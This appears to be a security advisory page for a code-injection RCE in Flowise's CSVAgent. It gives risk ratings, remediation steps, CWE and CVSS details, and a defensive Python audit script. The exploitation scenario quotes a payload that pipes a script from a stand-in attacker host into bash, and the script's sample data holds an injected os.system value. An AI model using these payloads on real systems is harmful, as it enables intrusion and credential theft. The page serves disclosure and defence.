CVE-2026-41137: Flowise: RCE via CSVAgent unsanitized code injection
HIGH | PoC AVAILABLE | CISA: ATTEND

A command injection flaw in Flowise's CSVAgent allows any low-privileged user to execute arbitrary OS commands on the server by supplying malicious Pandas code to the custom CSV read code field, which is interpolated and executed without sanitization. The CVSS score of 8.8, a public proof-of-concept exploit, network-accessible attack vector with no user interaction required, and only low-privilege authentication needed make this immediately actionable for any organization running Flowise — particularly those exposing AI workflow builders to developers, analysts, or external users. CISA's SSVC rating of ATTEND confirms near-term remediation is required, and with 59 known CVEs already tracked in this package, Flowise's aggregate security posture demands close scrutiny. Upgrade to Flowise 3.1.0 now; if patching is blocked, disable the CSVAgent node across all flows or restrict Flowise access to trusted administrators only and rotate all credentials accessible from the server environment.
What is the risk?
High risk. All three CVSS impact vectors (Confidentiality, Integrity, Availability) are rated High, requiring only low authentication and no user interaction over the network. A public PoC lowers the exploitation bar to script-level adversaries. Flowise is widely deployed in enterprise AI automation, internal tooling, and multi-user LLM workflow platforms, meaning successful exploitation can pivot to LLM API keys, vector databases, and connected business systems within the same deployment environment.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Flowise | npm | — | No patch |
Do you use Flowise? You're affected.
What should I do?
5 steps:
1. Immediate: Upgrade Flowise to version 3.1.0 or later, which contains the sanitization fix.
2. If upgrade is blocked, disable the CSVAgent node in all active flows and restrict Flowise UI access to trusted administrators only.
3. Rotate all credentials accessible from the Flowise server environment (LLM API keys, database credentials, cloud IAM tokens) as a precautionary measure if the instance was accessible to non-admin users.
4. Review server logs for unusual subprocess execution, unexpected outbound connections, or abnormal file system access patterns.
5. Audit all existing CSVAgent custom code configurations for previously injected malicious payloads before re-enabling after patching.
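For step 5, an added example (not Flowise's code and not part of the advisory): a Python script that parses each CSVAgent read-code value in an exported flow and flags anything that is not a single `read_csv(...)` call with literal arguments. The node name `csvAgent`, the input key `customReadCSV`, the `nodes[].data.inputs` layout and the sample flow are assumptions constructed for illustration; adjust them to match your own export.

```python
import ast

NODE_NAME = "csvAgent"        # assumed node identifier in exported flow JSON
CODE_FIELD = "customReadCSV"  # assumed key of the custom read code input
ALLOWED_CALLS = {"read_csv", "pd.read_csv"}
SAFE_ARG_NODES = (ast.Constant, ast.Name, ast.List, ast.Tuple, ast.Dict,
                  ast.UnaryOp, ast.USub, ast.Load)

def audit_read_code(code):
    """Return reasons the snippet is not a plain read_csv(...) call ([] if clean)."""
    try:
        call = ast.parse(code.strip(), mode="eval").body
    except SyntaxError:
        return ["not a single expression"]
    if not (isinstance(call, ast.Call) and ast.unparse(call.func) in ALLOWED_CALLS):
        return ["top-level expression is not read_csv(...)"]
    reasons = []
    for arg in call.args + [kw.value for kw in call.keywords]:
        for node in ast.walk(arg):
            if not isinstance(node, SAFE_ARG_NODES):
                reasons.append(f"{type(node).__name__} inside an argument")
            elif isinstance(node, ast.Name) and node.id != "csv_data":
                reasons.append(f"unexpected name {node.id!r}")
    return list(dict.fromkeys(reasons))  # de-duplicate, keep order

def audit_flow(flow):
    """Return [(node_id, reasons)] for CSVAgent nodes whose read code needs review."""
    findings = []
    for node in flow.get("nodes", []):
        data = node.get("data", {})
        code = data.get("inputs", {}).get(CODE_FIELD)
        if data.get("name") == NODE_NAME and code:
            reasons = audit_read_code(code)
            if reasons:
                findings.append((node.get("id"), reasons))
    return findings

# Constructed sample export; the last entry mirrors the pattern quoted on this page.
SAMPLE_FLOW = {"nodes": [
    {"id": "csvAgent_0", "data": {"name": NODE_NAME, "inputs": {
        CODE_FIELD: "read_csv(csv_data)"}}},
    {"id": "csvAgent_1", "data": {"name": NODE_NAME, "inputs": {
        CODE_FIELD: "read_csv(csv_data, sep=';', header=None, skiprows=[0, 1])"}}},
    {"id": "csvAgent_2", "data": {"name": NODE_NAME, "inputs": {
        CODE_FIELD: "read_csv(csv_data, sep=__import__('os').system('echo sample'))"}}},
]}

if __name__ == "__main__":
    for node_id, reasons in audit_flow(SAMPLE_FLOW):
        print(node_id, "->", "; ".join(reasons))
```

A clean result only means the field has the shape of a plain `read_csv` call; it is a triage aid for the audit step, not a substitute for upgrading to 3.1.0.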
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
Is CVE-2026-41137 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2026-41137, increasing the risk of exploitation.
What systems are affected by CVE-2026-41137?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM workflow builders, AI automation pipelines, multi-tenant AI platforms.
What is the CVSS score for CVE-2026-41137?
CVE-2026-41137 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 1.45%.
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0049 Exploit Public-Facing Application
- AML.T0050 Command and Scripting Interpreter
- AML.T0053 AI Agent Tool Invocation
- AML.T0083 Credentials from AI Agent Configuration
What are the technical details?
Original Advisory
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide a command injection payload that will get interpolated and executed by the server. This vulnerability is fixed in 3.1.0.
Exploitation Scenario
An attacker with a low-privilege Flowise account — a developer, analyst, or any user with access to the workflow builder — opens or creates a flow containing a CSVAgent node. They modify the custom Pandas CSV read code field to embed a command injection payload, for example injecting `__import__('os').system('curl https://attacker.com/shell.sh | bash')` within the Pandas code string. When the CSVAgent executes against any CSV file, Flowise interpolates the attacker-controlled code into the execution context without sanitization and runs it server-side with the Flowise process privileges. The attacker obtains a reverse shell, exfiltrates environment variables containing LLM API keys and database credentials, and establishes persistence within the AI workflow infrastructure.
Weaknesses (CWE)
CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
- [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
- [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Related Vulnerabilities
| CVE | Score | Title | Relation |
|---|---|---|---|
| CVE-2025-59528 | 10.0 | Flowise: Unauthenticated RCE via MCP config injection | Same package: flowise |
| CVE-2026-46442 | 9.9 | Flowise: sandbox escape enables authenticated RCE | Same package: flowise |
| CVE-2025-61913 | 9.9 | Flowise: path traversal in file tools leads to RCE | Same package: flowise |
| CVE-2026-40933 | 9.9 | Flowise: RCE via MCP stdio command injection | Same package: flowise |
| CVE-2026-56274 | 9.9 | Flowise: RCE via MCP server command validation bypass | Same package: flowise |